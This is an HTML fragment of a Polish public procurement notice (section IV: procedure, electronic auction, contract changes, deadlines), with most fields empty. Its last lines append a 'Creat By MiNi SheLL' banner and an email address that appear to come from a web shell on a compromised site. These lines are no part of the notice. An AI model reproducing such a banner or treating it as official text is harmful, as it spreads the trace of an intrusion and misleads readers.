style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>dyspozycyjność</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-03-25</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com